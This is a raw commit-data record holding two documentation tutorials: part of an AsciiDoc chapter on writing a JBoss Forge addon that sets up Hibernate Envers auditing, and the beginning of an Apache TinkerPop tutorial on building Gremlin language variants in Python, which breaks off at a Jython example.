enabling and disabling in several ways. We will show one of these: by\nimplementing the `isEnabled` method. There we will again obtain the `DependencyFacet` and will ask it whether the\ndesired dependency is installed. If this method returns false, the Forge commands wizard will not list the Audit entity\ncommand and it will not be available in the command completion in CLI. This is the implementation:\n\n[source, java]\n----\n @Override\n public boolean isEnabled(UIContext context)\n {\n Dependency dependency = DependencyBuilder\n .create(\"org.hibernate\")\n .setArtifactId(\"hibernate-envers\")\n return getSelectedProject(context).getFacet(DependencyFacet.class)\n .hasEffectiveDependency(dependency);\n }\n----\n\nOur first addon is ready. We can now build it, deploy it and run it on the Java EE project that we created in the\nbeginning of this chapter.\n\n==== Installing and trying the Envers addon\n\n==== Forge configuration and Forge command execution listeners\n\nIn this final section of this chapter we will show you some more features that you could use when developing Forge\naddons. In order to showcase those, we will add a new requirement to the envers addon. Suppose that we want when we\nset it up to state that we want every new JPA entity that we create to be automatically audited. This means that the\nEnvers: Setup command should be executable more than once, but it should add the Hibernate Envers dependency in the POM\nonly the first time it was executed. +\n\nSo, our first job is to enhance our setup command with UI in the form of a checkbox that asks the user whether they\nwant their JPA entities to be automatically auditable. We'll use again the familiar `UIInput` class, but this time\nwe'll generify it with Boolean. This will tell the IDE integration of Forge to automatically create a checkbox:\n\n[source, java]\n----\n @Inject\n @WithAttributes(label = \"Audit automatically new entities\",\n description = \"Automatically make an entity auditable after it is created\")\n private UIInput<Boolean> enableAutoAudit;\n----\n\nLet's now add the checkbox to the command dialog using the `UIBuilder`:\n\n[source, java]\n----\n @Override\n public void initializeUI(UIBuilder builder) throws Exception\n {\n builder.add(enableAutoAudit);\n }\n----\n\nNext, we are going to make it possible running the setup command numerous times without polluting our POM file with as\nmany dependencies to Hibernate Envers. For that we are going to use something as familiar - the DependencyFacet:\n\n[source, java]\n----\n @Override\n public Result execute(UIExecutionContext context) throws Exception\n {\n Dependency dependency = DependencyBuilder\n .create(HIBERNATE_GROUP_ID)\n .setArtifactId(ENVERS_ARTIFACT_ID)\n .setVersion(\"4.3.6.Final\")\n .setScopeType(\"provided\");\n if (!getSelectedProject(context).getFacet(DependencyFacet.class)\n .hasDirectDependency(dependency))\n {\n dependencyInstaller.install(getSelectedProject(context), dependency);\n }\n\n return Results.success(\"Envers was successfully setup for the current project!\");\n }\n----\n\nFinally we want to tell potentially other addons and commands whether the user wants or not to automatically add\nauditing to newly created JPA entities. For that we can use Forge's configuration. It is file based key-value-pair API,\nwhich can be used for storing project or Forge settings. The pairs are stored in forge.xml file. Depending whether the\nconfig concerns the project or Forge itself, it is located either in the project root directory (this is the only\nnon-project artifact that Forge creates) or under ~\/.forge directory respectively. +\n\nIn order to get hold of the project configuration, you need to ask the `ConfigurationFacet` for it:\n[source, java]\n----\n Configuration config = getSelectedProject(context)\n .getFacet(ConfigurationFacet.class)\n .getConfiguration();\n----\n\nJust for the sake of completeness, the global Forge configuration is available through CDI injection:\n\n[source, java]\n----\n @Inject\n private Configuration config;\n----\n\nUsing the configuration API is as straightforward as using the `Hashtable` API for example. We can add this line in the\n`execute` method just before the return statement:\n\n[source, java]\n----\n config.setProperty(\"autoAudit\", enableAutoAudit.getValue());\n----\n\nNow, whenever and wherever we want to find whether the user has decided to automatically audit new JPA entities, we'll\njust need to lookup the _autoAudit_ entry in the project configuration. +\n\nWe can furthermore enhance the UI of our command by reading the configuration upon building it and finding out what is\nthe current value of _autoAudit_. Based on that we can change the default value of our checkbox. For example, if the\nuser has already run the setup command and has checked the checkbox, the next time when they run it, we want it checked\nrather than unchecked. As usually we want to take care of the situation when the entry is not available at all, i.e. the\nproperty is null:\n\n[source, java]\n----\n Configuration config = getSelectedProject(builder)\n .getFacet(ConfigurationFacet.class)\n .getConfiguration();\n Object auditSettings = config.getProperty(AUTO_AUDIT_CONFIG_ENTRY);\n enableAutoAudit.setDefaultValue(\n auditSettings == null ? false : (Boolean) auditSettings);\n----\n","old_contents":"== Developing Forge\n\n\n=== Developing a web application in few seconds\n\n=== Developing Hibernate Envers addon\n\nhttp:\/\/envers.jboss.org\/[Hibernate Envers] is a Hibernate core module that enables auditing of persistence classes.\nIf you want to audit the history of all the changes made to a certain entity or one of its fields during the web\napplication runtime, you just need to audit that with `@Audited`. Envers will create a separate table for each such\nentity, which will hold the changes made to it. +\n\nIn this lab we will develop a Forge addon with the following features:\n\n* Setup Envers for the following project by adding its dependency to the POM\n* Enable auditing an entity by adding the `@Audited` annotation on class level\n\n==== Creating a new Forge addon\n\nCreating a new Forge addon is similar to any new project that you want to create. You can do it manually, you can copy\nand modify an existing project of the same type or you can use a wizard to do it for you. We would certainly recommend\nusing Forge to help you bootstrap everything for several reasons. It knows what exactly which dependencies and artifacts\nyou need as a start so you will not miss anything. Forge will also not create any garbage in your new project. +\n\nBefore creating the Envers addon, you need to start Forge. Please make sure that you have followed the instructions\nin <<installing-forge>> before that. You can create a new addon if you run the following command in the Forge CLI: +\n\n[source, console]\n----\nproject-new --named envers --type addon --topLevelPackage org.jboss.forge.addon --addons org.jboss.forge.addon:javaee,2.12.0.Final\n----\n\nIf you run Forge from JBDS, open the Forge wizard (Ctrl + 4 or CMD + 4 on Mac) then select _Project: New_ and specify\n_envers_ as project name, _org.jboss.forge.addon_ as top level package, enter project location per your preference and\nas a Project type select _Forge Addon_:\n\nimage::developing\/forge-new-project.png[title=\"Creating new addon project\"]\n\nThis will create an empty Maven project that has the following artifacts:\n\n* *pom.xml* where the top level package is the group ID and the project name is the artifact ID. Besides the minimum\nForge dependencies, the command will add also those that you have specified with the `--addons` option in the format\n<group-id>:<artifact-id>,<version>\n* *Standard maven directory structure* plus the top level package\n* *Empty +beans.xml+* in the +src\/main\/resources\/META-INF+ directory. This is because Forge and its addons strongly\nrely on the CDI development model\n* *README.asciidoc* file with a standard skeleton for documenting Forge addons\n\n==== Developing the \"Envers: Setup\" command\n\nThe first command that we are going to create will set up Envers for a project. This basically means that the command\nwill simply add the Envers library dependency to the current project POM. As with the new Forge addon, we can manually\nwrite the command class, copy and modify an existing command or let Forge itself generated it for us. Here we will go\nfor the third option.\n\nIf you are running from the command line interface, type in: +\n\n[source, console]\n----\naddon-new-ui-command --named EnversSetupCommand --commandName \"Envers: Setup\" --categories \"Auditing\"\n----\n\nWhile from the JBDS, after opening the Forge wizard (Ctrl + 4 or CMD + 4 on Mac), you should choose _Addon: New UI Command_\nand enter _EnversSetupCommand_ in the Type Name field, _Envers: Setup_ in the Command name field and add _Auditing_ to\nthe Categories list box: +\n\nimage::developing\/forge-envers-setup-command.png[title=\"Creating _Envers: Setup_ command\"]\n\nThis will generate `EnversSetupCommand` class in the `org.jboss.forge.addon.commands` package (unless you didn't specify\nexplicitly anything else). Forge makes this class extend `AbstractUICommand`, which provides some basic functionality\nlike configuring the command name, the command dialog and the command execution. We will go through these in this and\nthe next few sections. +\n\nThe `getMetadata()` method should be already implemented by Forge:\n\n[source, java]\n----\n @Override\n public UICommandMetadata getMetadata(UIContext context)\n {\n return Metadata.forCommand(EnversSetupCommand.class).name(\n \"Envers: Setup\").category(Categories.create(\"Auditing\"));\n }\n----\n\nThis will basically create a command that can be called _envers-setup_ from the CLI (note the substitution of colons and\nspaces by hyphens) and as _Envers: Setup_ in the _Auditing_ category in the Forge wizard: +\n\nimage::developing\/forge-envers-setup-command-wizard.png[title=\"_Envers: Setup_ command in the _Auditing_ category\"]\n\nAs the newly created command will not require any input from the user, we will leave the `initializeUI` method empty.\nHowever, in order to implement the command execution, we will need to change a little bit our class. More precisely we\nwill have to extend from another abstract command class. The rationale behind this is that we want to update the\n*current* project POM. Extending `AbstractProjectCommand` instead of `AbstractUICommand` will give us some handy\nmethods to access and manipulate the project configuration:\n\n[source, java]\n----\npublic class EnversSetupCommand extends AbstractProjectCommand\n{\n----\n\nWe will have to implement two more abstract methods coming from this parent class:\n\n[source, java]\n----\n @Override\n protected boolean isProjectRequired() \n {\n return true;\n }\n\n @Inject\n private ProjectFactory projectFactory;\n\n @Override\n protected ProjectFactory getProjectFactory() \n {\n return projectFactory;\n }\n----\n\nAfter having specified _Envers: Setup_ as a project command, we can proceed to implementing the `execute` method.\nUsually this is called when the user clicks Finish on the command dialog or in our case where we don't require input:\nwhen the user selects the command from the Forge wizard. +\n\nAs we mentioned earlier, the command will have to add the Hibernate Envers dependency to the project. We are going to\nbuild the Forge representation of this dependency using the DependencyBuilder's utility methods:\n\n[source, java]\n----\n @Override\n public Result execute(UIExecutionContext context) throws Exception\n {\n Dependency dependency = \n DependencyBuilder.create(\"org.hibernate\")\n .setArtifactId(\"hibernate-envers\")\n .setVersion(\"4.3.6.Final\")\n .setScopeType(\"provided\");\n }\n\n----\n\nSpeaking in Maven terms, this is a dependency to artifact with ID +hibernate-envers+, coming from the +org.hibernate+\ngroup, having version 4.3.6.Final and going into the project's _provided_ scope. +\n\nAfter we have specified our dependency, we will have to add it to the project model. For that purpose we will use the\n`DependencyInstaller` utility, coming from the projects addon:\n\n[source, java]\n----\n @Inject\n private DependencyInstaller dependencyInstaller;\n----\n\nForge 2.0 is based on modular runtime called _Furnace_. The core of Furnace itself is not bound to any development model,\nso the addons can decide which of the Furnace implementations it wants to use. We created our addon with the default\nconfiguration which enables the CDI development model. That is why we asked in the code snippet above Forge to provide\nus with the dependency installer for the current project build system. +\n\nNow it is time to install our dependency:\n\n[source, java]\n----\n @Override\n public Result execute(UIExecutionContext context) throws Exception\n {\n Dependency dependency =\n DependencyBuilder.create(\"org.hibernate\")\n .setArtifactId(\"hibernate-envers\")\n .setVersion(\"4.3.6.Final\")\n .setScopeType(\"provided\");\n dependencyInstaller.install(getSelectedProject(context), dependency);\n\n }\n----\n\nWe are using here one of the helper methods provided by the `AbstractProjectCommand`: `getSelectedProject()`. +\n\nNow our job is done, so it is time to report what we did. We do it by returning the result:\n\n[source, java]\n----\n @Override\n public Result execute(UIExecutionContext context) throws Exception\n {\n Dependency dependency =\n DependencyBuilder.create(\"org.hibernate\")\n .setArtifactId(\"hibernate-envers\")\n .setVersion(\"4.3.6.Final\")\n .setScopeType(\"provided\");\n dependencyInstaller.install(getSelectedProject(context), dependency);\n return Results.success(\"Envers was successfully setup for the current project!\");\n }\n----\n\nThis will result in a SUCCESS: message in the command line interface and a green popup in the JDBS after our command is\nexecuted. +\n\nNow that we have a command the enables Hibernate Envers, it is time to add another command that will turn on auditing\nfor a given JPA entity.\n\n==== Adding some UI with the \"Envers: Audit entity\" command\n\nWe will create the class for the new command in the same way that we created the one for \"Envers: Setup\": with the help\nof Forge. If you are running the CLI, then simply type:\n\n[source, console]\n----\naddon-new-ui-command --named EnversAuditEntityCommand --commandName \"Envers: Audit entity\" --categories \"Auditing\"\n----\n\nOr alternatively in the JBDS choose _Addon: New UI Command_, enter _EnversAuditEntityCommand_ in the Type Name field,\n_Envers: Audit entity_ in the Command name field and add _Auditing_ to the Categories list box: +\n\nimage::developing\/forge-envers-audit-entity-command.png[title=\"Creating _Envers: Audit entity_ command\"]\n\nThen open the newly created class and make it extend `AbstractProjectCommand` instead of `AbstractUICommand` and also\nadd the unimplemented methods the way you did it in the setup command. +\n\nThis command will have to receive as input the entity class that has to be audited. To achieve this, we need to do two\nthings:\n\n. Obtain and configure a `UIInput` object from Furnace\n. Add our input to the `UIBuilder` in the `initializeUI` method\n\nStarting from number one, we should add the following member field to our command class:\n\n[source, java]\n----\n @Inject\n @WithAttributes(label = \"Entity to audit\", required = true)\n private UIInput<JavaResource> auditEntity;\n----\n\nHere we call our field auditEntity. This automatically will add a `--auditEntity` option to our command in the CLI.\nThe type of the field is `UIInput<JavaResource>`, which means a few things:\n\n* The JBDS integration will create a text box control for the audit entity, while the command line interface will expect\na single unbounded value\n* The type of the value for this option should be a file that represents a Java type (class, interface or enumeration)\n\nWe have also specified some additional attributes with the `@WithAttributes` annotation:\n\n* The `label` attribute tells Forge's JBDS integration to override the field name (`auditEntity` in this case) with\n_Entity to audit_. This will be the actual label of the text box in the IDE. This will not however change the option\nname on the command line\n* The `required` attribute will not let the user complete the dialog without entering a value for the entity. The well\nknown asterisk character will be displayed along the label in JBDS\n\nAfter we defined the input field, it is time to add it to the command dialog. In order to do that, we should edit the\n`initializeUI` method:\n\n[source, java]\n----\n @Override\n public void initializeUI(UIBuilder builder) throws Exception\n {\n builder.add(auditEntity);\n }\n----\n\nWe can tell now Forge to show a _Browse_ button to the right of the input field, which will open the well known\ntype picker of Eclipse:\n\n[source, java]\n----\n @Override\n public void initializeUI(UIBuilder builder) throws Exception\n {\n auditEntity.getFacet(HintsFacet.class).setInputType(InputType.JAVA_CLASS_PICKER);\n builder.add(auditEntity);\n }\n----\n\nIn Forge you can also set default values for a certain input. This way you can omit specifying its value on the command\nline and in the IDE it will be pre-filled in the command dialog. You can do that with the `setDefaultValue` method of the\n`UIInput`. In our case the UIInput is generified over the JavaResource class. So we'll have to check whether the current\nselection in the UI (being the CLI or JBDS) is a file that represents a Java type. If yes, we will set it as the default\nvalue of the text field:\n\n[source, java]\n----\n @Override\n public void initializeUI(UIBuilder builder) throws Exception\n {\n auditEntity.getFacet(HintsFacet.class).setInputType(InputType.JAVA_CLASS_PICKER);\n Object selection = builder.getUIContext().getInitialSelection().get();\n if (selection instanceof JavaResource)\n auditEntity.setDefaultValue((JavaResource) selection);\n builder.add(auditEntity);\n }\n----\n\nNow the UI of the command is ready. We can go on and implement the `execute` method. First we should get the value\nentered in the text field and convert it to `JavaResource`. Then we will extract the `JavaClassSource` out of it so\nthat we can manipulate things like annotations:\n\n[source, java]\n----\n @Override\n public Result execute(UIExecutionContext context) throws Exception\n {\n JavaResource javaResource = auditEntity.getValue().reify(JavaResource.class);\n JavaClassSource javaClass = javaResource.getJavaType();\n\n }\n----\n\nNext we will check whether the chosen class has already the `Audited` annotation and if not, will add it to that. At the\nend we'll save the new content and will return successful result:\n\n[source, java]\n----\n @Override\n public Result execute(UIExecutionContext context) throws Exception\n {\n JavaResource javaResource = auditEntity.getValue().reify(JavaResource.class);\n JavaClassSource javaClass = javaResource.getJavaType();\n if (!javaClass.hasAnnotation(\"org.hibernate.envers.Audited\")) {\n javaClass.addAnnotation(\"org.hibernate.envers.Audited\");\n }\n javaResource.setContents(javaClass);\n return Results.success(\n \"Entity \" + javaClass.getQualifiedName() + \" was successfully audited\");\n }\n----\n\nBut what if the user enters invalid input? This could be a file that does not exist, or is not a class or is not a JPA\nentity. We'll implement the `validate(UIValidationContext validator)` method to handle such situations. Whenever it\nfinds illegal input, it will add a validation error to the `validator` parameter. This will bring an error message if\nthe command executes in the CLI and in JBDS will disable the Finish button of the dialog, showing the error message in\nits well known location. This is how we implement the method:\n\n[source, java]\n----\n @Override\n public void validate(UIValidationContext validator)\n {\n super.validate(validator);\n try\n {\n if (!auditEntity.getValue().reify(JavaResource.class).getJavaType()\n .hasAnnotation(Entity.class))\n {\n validator.addValidationError(auditEntity,\n \"The selected class has to be JPA entity\");\n }\n }\n catch (FileNotFoundException e)\n {\n validator.addValidationError(auditEntity,\n \"You must select existing JPA entity to audit\");\n }\n }\n----\n\nFinally, we want to avoid some compilation errors in the project where we will run this command. So it should be only\navailable for execution if the user has called the setup command first, i.e. if the current project has dependency to\nHibernate Envers. You can implement this enabling and disabling in several ways. We will show one of these: by\nimplementing the `isEnabled` method. There we will again obtain the `DependencyFacet` and will ask it whether the\ndesired dependency is installed. If this method returns false, the Forge commands wizard will not list the Audit entity\ncommand and it will not be available in the command completion in CLI. This is the implementation:\n\n[source, java]\n----\n @Override\n public boolean isEnabled(UIContext context)\n {\n Dependency dependency = DependencyBuilder\n .create(\"org.hibernate\")\n .setArtifactId(\"hibernate-envers\")\n return getSelectedProject(context).getFacet(DependencyFacet.class)\n .hasEffectiveDependency(dependency);\n }\n----\n\nOur first addon is ready. We can now build it, deploy it and run it on the Java EE project that we created in the\nbeginning of this chapter.\n\n==== Installing and trying the Envers addon\n\n==== Forge configuration and Forge command execution listeners\n\nIn this final section of this chapter we will show you some more features that you could use when developing Forge\naddons. In order to showcase those, we will add a new requirement to the envers addon. Suppose that we want when we\nset it up to state that we want every new JPA entity that we create to be automatically audited. This means that the\nEnvers: Setup command should be executable more than once, but it should add the Hibernate Envers dependency in the POM\nonly the first time it was executed. +\n\nSo, our first job is to enhance our setup command with UI in the form of a checkbox that asks the user whether they\nwant their JPA entities to be automatically auditable. We'll use again the familiar `UIInput` class, but this time\nwe'll generify it with Boolean. This will tell the IDE integration of Forge to automatically create a checkbox:\n\n[source, java]\n----\n @Inject\n @WithAttributes(label = \"Audit automatically new entities\",\n description = \"Automatically make an entity auditable after it is created\")\n private UIInput<Boolean> enableAutoAudit;\n----\n\nLet's now add the checkbox to the command dialog using the `UIBuilder`:\n\n[source, java]\n----\n @Override\n public void initializeUI(UIBuilder builder) throws Exception\n {\n builder.add(enableAutoAudit);\n }\n----\n\nNext, we are going to make it possible running the setup command numerous times without polluting our POM file with as\nmany dependencies to Hibernate Envers. For that we are going to use something as familiar - the DependencyFacet:\n\n[source, java]\n----\n @Override\n public Result execute(UIExecutionContext context) throws Exception\n {\n Dependency dependency = DependencyBuilder\n .create(HIBERNATE_GROUP_ID)\n .setArtifactId(ENVERS_ARTIFACT_ID)\n .setVersion(\"4.3.6.Final\")\n .setScopeType(\"provided\");\n if (!getSelectedProject(context).getFacet(DependencyFacet.class)\n .hasDirectDependency(dependency))\n {\n dependencyInstaller.install(getSelectedProject(context), dependency);\n }\n\n return Results.success(\"Envers was successfully setup for the current project!\");\n }\n----\n\nFinally we want to tell potentially other addons and commands whether the user wants or not to automatically add\nauditing to newly created JPA entities. For that we can use Forge's configuration. It is file based key-value-pair API,\nwhich can be used for storing project or Forge settings. The pairs are stored in forge.xml file. Depending whether the\nconfig concerns the project or Forge itself, it is located either in the project root directory (this is the only\nnon-project artifact that Forge creates) or under ~\/.forge directory respectively. +\n\nIn order to get hold of the project configuration, you need to ask the `ConfigurationFacet` for it:\n[source, java]\n----\n Configuration config = getSelectedProject(context)\n .getFacet(ConfigurationFacet.class)\n .getConfiguration();\n----\n\nJust for the sake of completeness, the global Forge configuration is available through CDI injection:\n\n[source, java]\n----\n @Inject\n private Configuration config;\n----\n\nUsing the configuration API is as straightforward as using the `Hashtable` API for example. We can add this line in the\n`execute` method just before the return statement:\n\n[source, java]\n----\n config.setProperty(\"autoAudit\", enableAutoAudit.getValue());\n----\n\nNow, whenever and wherever we want to find whether the user has decided to automatically audit new JPA entities, we'll\njust need to lookup the _autoAudit_ entry in the project configuration. +\n\nWe can furthermore enhance the UI of our command by reading the configuration upon building it and finding out what is\nthe current value of _autoAudit_. Based on that we can change the default value of our checkbox. For example, if the\nuser has already run the setup command and has checked the checkbox, the next time when they run it, we want it checked\nrather than unchecked. As usually we want to take care of the situation when the entry is not available at all, i.e. the\nproperty is null:\n\n[source, java]\n----\n Configuration config = getSelectedProject(builder)\n .getFacet(ConfigurationFacet.class)\n .getConfiguration();\n Object auditSettings = config.getProperty(AUTO_AUDIT_CONFIG_ENTRY);\n enableAutoAudit.setDefaultValue(\n auditSettings == null ? false : (Boolean) auditSettings);\n----\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"02fbfbf1b3a94c7654a5668c0b01ae8952347e9a","subject":"Minor adjustments to the language variants tutorial given restructing of reference docs CTR","message":"Minor adjustments to the language variants tutorial given restructing of reference docs CTR\n","repos":"krlohnes\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,pluradj\/incubator-tinkerpop","old_file":"docs\/src\/tutorials\/gremlin-language-variants\/index.asciidoc","new_file":"docs\/src\/tutorials\/gremlin-language-variants\/index.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n\nimage::apache-tinkerpop-logo.png[width=500,link=\"http:\/\/tinkerpop.apache.org\"]\n\n*x.y.z*\n\n== Gremlin Language Variants\n\nGremlin is an embeddable query language that can be represented using the constructs of a host programming language.\nAny programming language that supports link:https:\/\/en.wikipedia.org\/wiki\/Function_composition[function composition]\n(e.g. fluent chaining) and link:https:\/\/en.wikipedia.org\/wiki\/Nested_function[function nesting] (e.g. call stacks)\ncan support Gremlin. Nearly every modern programming language is capable of meeting both requirements.\nWith Gremlin, the distinction between a programming language and a query language is not as large as they\nhave historically been. For instance, with Gremlin-Java, the developer is able to have their application code and their\ngraph database queries at the same level of abstraction -- both written in Java. A simple example is presented below\nwhere the `MyApplication` Java class contains both application-level and database-level code written in Java.\n\nimage::gremlin-house-of-mirrors.png[width=1024]\n\nWARNING: This is an advanced tutorial intended for experts knowledgeable in Gremlin in particular and TinkerPop in\ngeneral. Moreover, the audience should understand advanced programming language concepts such as reflection,\nmeta-programming, source code generation, and virtual machines.\n\n[source,java]\n----\npublic class MyApplication {\n\n public static void run(String[] args) {\n\n \/\/ assumes args[0] is a configuration file location\n Graph graph = GraphFactory.open(args[0]);\n GraphTraversalSource g = graph.traversal();\n\n \/\/ assumes that args[1] and args[2] are range boundaries\n Iterator<Map<String,Double>> result =\n g.V().hasLabel(\"product\").\n order().by(\"unitPrice\", asc).\n range(Integer.valueOf(args[1]), Integer.valueOf(args[2])).\n valueMap(\"name\", \"unitPrice\")\n\n while(result.hasNext()) {\n Map<String,Double> map = result.next();\n System.out.println(map.get(\"name\") + \" \" + map.get(\"unitPrice\"));\n }\n }\n}\n----\n\nIn query languages like link:https:\/\/en.wikipedia.org\/wiki\/SQL[SQL], the user must construct a string representation of\ntheir query and submit it to the database for evaluation. This is because SQL cannot be expressed in Java as they use\nfundamentally different constructs in their expression. The same example above is presented below using SQL and the\nlink:https:\/\/en.wikipedia.org\/wiki\/Java_Database_Connectivity[JDBC] interface. The take home point is that Gremlin does\nnot exist outside the programming language in which it will be used. Gremlin was designed to be able to be\nembedded in any modern programming language and thus, always free from the complexities of string manipulation as seen\nin other database and analytics query languages.\n\n[source,java]\n----\npublic class MyApplication {\n\n public static void run(final String[] args) {\n\n \/\/ assumes args[0] is a URI to the database\n Connection connection = DriverManager.getConnection(args[0])\n Statement statement = connection.createStatement();\n\n \/\/ assumes that args[1] and args[2] are range boundaries\n ResultSet result = statement.executeQuery(\n \"SELECT Products.ProductName, Products.UnitPrice \\n\" +\n \" FROM (SELECT ROW_NUMBER() \\n\" +\n \" OVER ( \\n\" +\n \" ORDER BY UnitPrice) AS [ROW_NUMBER], \\n\" +\n \" ProductID \\n\" +\n \" FROM Products) AS SortedProducts \\n\" +\n \" INNER JOIN Products \\n\" +\n \" ON Products.ProductID = SortedProducts.ProductID \\n\" +\n \" WHERE [ROW_NUMBER] BETWEEN \" + args[1] + \" AND \" + args[2] + \" \\n\" +\n \"ORDER BY [ROW_NUMBER]\"\n\n while(result.hasNext()) {\n result.next();\n System.out.println(result.getString(\"Products.ProductName\") + \" \" + result.getDouble(\"Products.UnitPrice\"));\n }\n }\n}\n----\n\nThe purpose of this tutorial is to explain how to develop a _Gremlin language variant_. That is, for those developers\nwho are interested in supporting Gremlin in their native language and there currently does not exist a (good) Gremlin\nvariant in their language, they can develop one for the Apache TinkerPop community (and their language community in\ngeneral). In this tutorial, link:https:\/\/www.python.org\/[Python] will serve as the host language and two typical\nimplementation models will be presented.\n\n1. <<using-jython-and-the-jvm,**Using Jython and the JVM**>>: This is perhaps the easiest way to produce a Gremlin\nlanguage variant. With link:https:\/\/www.jcp.org\/en\/jsr\/detail?id=223[JSR-223], any language compiler written for the JVM\ncan directly access the JVM and any of its libraries (including Gremlin-Java).\n\n2. <<using-python-and-gremlin-server,**Using Python and GremlinServer**>>: This model requires that there exist a Python\nclass that mimics Gremlin-Java's `GraphTraversal` API. With each method call of this Python class, Gremlin `Bytecode` is\ngenerated which is ultimately translated into a Gremlin variant that can execute the traversal (e.g. Gremlin-Java).\n\nIMPORTANT: Apache TinkerPop's Gremlin-Java is considered the idiomatic, standard implementation of Gremlin.\nAny Gremlin language variant, regardless of the implementation model chosen, **must**, within the constraints of the\nhost language, be in 1-to-1 correspondence with Gremlin-Java. This ensures that language variants are collectively\nconsistent and easily leveraged by anyone versed in Gremlin.\n\nIMPORTANT: The \"Gremlin-Python\" presented in this tutorial is basic and provided to show the primary techniques used to\nconstruct a Gremlin language variant. Apache TinkerPop distributes with a full fledged\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#gremlin-python[Gremlin-Python] variant that uses many of the\ntechniques presented in this tutorial.\n\n[[language-drivers-vs-language-variants]]\n== Language Drivers vs. Language Variants\n\nBefore discussing how to implement a Gremlin language variant in Python, it is necessary to understand two concepts\nrelated to Gremlin language development. There is a difference between a _language driver_ and a _language variant_\nand it is important that these two concepts (and their respective implementations) remain separate.\n\n=== Language Drivers\n\nimage:language-drivers.png[width=375,float=right] A Gremlin language driver is a software library that is able to\ncommunicate with a TinkerPop-enabled graph system whether directly via the JVM or indirectly via\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#connecting-gremlin-server[Gremlin Server] Gremlin Server or some\nother link:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#connecting-rgp[RemoteConnection] enabled graph system.\nLanguage drivers are responsible for submitting Gremlin traversals to a TinkerPop-enabled graph system and\nreturning results to the developer that are within the developer's language's type system.\nFor instance, resultant doubles should be coerced to floats in Python.\n\nThis tutorial is not about language drivers, but about language variants. Moreover, community libraries should make\nthis distinction clear and **should not** develop libraries that serve both roles. Language drivers will be useful to\na collection of Gremlin variants within a language community -- able to support `GraphTraversal`-variants as well as\nalso other link:https:\/\/en.wikipedia.org\/wiki\/Domain-specific_language[DSL]-variants (e.g. `SocialTraversal`).\n\nNOTE: `GraphTraversal` is a particular Gremlin domain-specific language (link:https:\/\/en.wikipedia.org\/wiki\/Domain-specific_language[DSL]),\nalbeit the most popular and foundational DSL. If another DSL is created, then the same techniques discussed in this\ntutorial for `GraphTraversal` apply to `XXXTraversal`.\n\n=== Language Variants\n\nimage:language-variants.png[width=375,float=right] A Gremlin language variant is a software library that allows a\ndeveloper to write a Gremlin traversal within their native programming language. The language variant is responsible\nfor creating Gremlin `Bytecode` that will ultimately be translated and compiled to a `Traversal` by a\nTinkerPop-enabled graph system.\n\nEvery language variant, regardless of the implementation details, will have to account for the four core concepts below:\n\n1. `Graph` (**data**): The source of the graph data to be traversed and the interface which enables the creation of a\n`GraphTraversalSource` (via `graph.traversal()`).\n\n2. `GraphTraversalSource` (**compiler**): This is the typical `g` reference. A `GraphTraversalSource` maintains the\n`withXXX()`-strategy methods as well as the \"traversal spawn\"-methods such as `V()`, `E()`, `addV()`, etc.\nA traversal source's registered `TraversalStrategies` determine how the submitted traversal will be ultimately\nevaluated.\n\n3. `GraphTraversal` (**function composition**): A graph traversal maintains the computational steps such as `out()`, `groupCount()`,\n`match()`, etc. This fluent interface supports method chaining and thus, a linear \"left-to-right\" representation of a\ntraversal\/query.\n\n4. `__` (**function nesting**) : The anonymous traversal class is used for passing a traversal as an argument to a\nparent step. For example, in `repeat(__.out())`, `__.out()` is an anonymous traversal passed to the traversal parent\n`repeat()`. Anonymous traversals enable the \"top-to-bottom\" representation of a traversal.\n\n5. `Bytecode` (**language agnostic encoding**): The source and traversal steps and their arguments are encoded in a\nlanguage agnostic representation called Gremlin bytecode. This representation is a nested list of the form\n`[step,[args*]]*`.\n\nBoth `GraphTraversal` and `__` define the structure of the Gremlin language. Gremlin is a _two-dimensional language_\nsupporting linear, nested step sequences. Historically, many Gremlin language variants have failed to make the\ndistinctions above clear and in doing so, either complicate their implementations or yield variants that are not in\n1-to-1 correspondence with Gremlin-Java. By keeping these concepts clear when designing a language variant, the\nconstruction of the Gremlin bytecode representation is easy.\n\nIMPORTANT: The term \"Gremlin-Java\" denotes the language that is defined by `GraphTraversalSource`, `GraphTraversal`,\nand `__`. These three classes exist in `org.apache.tinkerpop.gremlin.process.traversal.dsl.graph` and form the\ndefinitive representation of the Gremlin traversal language.\n\n== Gremlin-Jython and Gremlin-Python\n\n[[using-jython-and-the-jvm]]\n=== Using Jython and the JVM\n\nimage:jython-logo.png[width=200,float=left,link=\"http:\/\/www.jython.org\/\"] link:http:\/\/www.jython.org\/[Jython] provides a\nlink:https:\/\/www.jcp.org\/en\/jsr\/detail?id=223[JSR-223] `ScriptEngine` implementation that enables the evaluation of\nPython on the link:https:\/\/en.wikipedia.org\/wiki\/Java_virtual_machine[Java virtual machine]. In other words, Jython's\nvirtual machine is not the standard link:https:\/\/wiki.python.org\/moin\/CPython[CPython] reference implementation\ndistributed with most operating systems, but instead the JVM. The benefit of Jython is that Python code and classes\ncan easily interact with the Java API and any Java packages on the `CLASSPATH`. In general, any JSR-223 Gremlin language\nvariant is trivial to \"implement.\"\n\n[source,python]\n----\nJython 2.7.0 (default:9987c746f838, Apr 29 2015, 